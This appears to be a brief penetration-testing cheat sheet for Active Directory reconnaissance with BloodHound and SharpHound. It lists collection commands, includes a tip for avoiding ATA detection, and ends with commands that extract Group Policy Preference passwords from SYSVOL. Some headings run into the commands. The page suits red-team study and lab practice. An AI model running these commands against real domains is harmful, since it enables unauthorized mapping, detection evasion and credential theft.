BloodHound Enumeration
BloodHound
Enable Sharp-Hound
Supply data to BloodHound
The generated archive can be uploaded to the BloodHound application.
Remote BloodHound
bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
bloodhound-python -u user -p password -ns 192.168.1.5 -d hacktor.local -c AllOn-Site BloodHound
#Using exe investor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
.\SharpHound.exe All
#Using PowerShell module investor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All,LoggedOnTo avoid detections like ATA
Invoke-BloodHound -CollectionMethod All -ExcludeDCNeo4j
Start neo4j and BloodHound UI on kali machine and load the zip/json files
sudo neo4j startif you found win server lessThan 2016 like as 2012 R2 or less you can use these commands to show local users this option (Local user) unavailable on win server 2016
#To show password # from powersploit
Get-GPPPassword -Server PDC.wargrey.mon
#also to show password from sysvol in winServer2012
findstr /S /I cpassword \\PDC\sysvol\wargrey.mon\Policies\*.xmlLast updated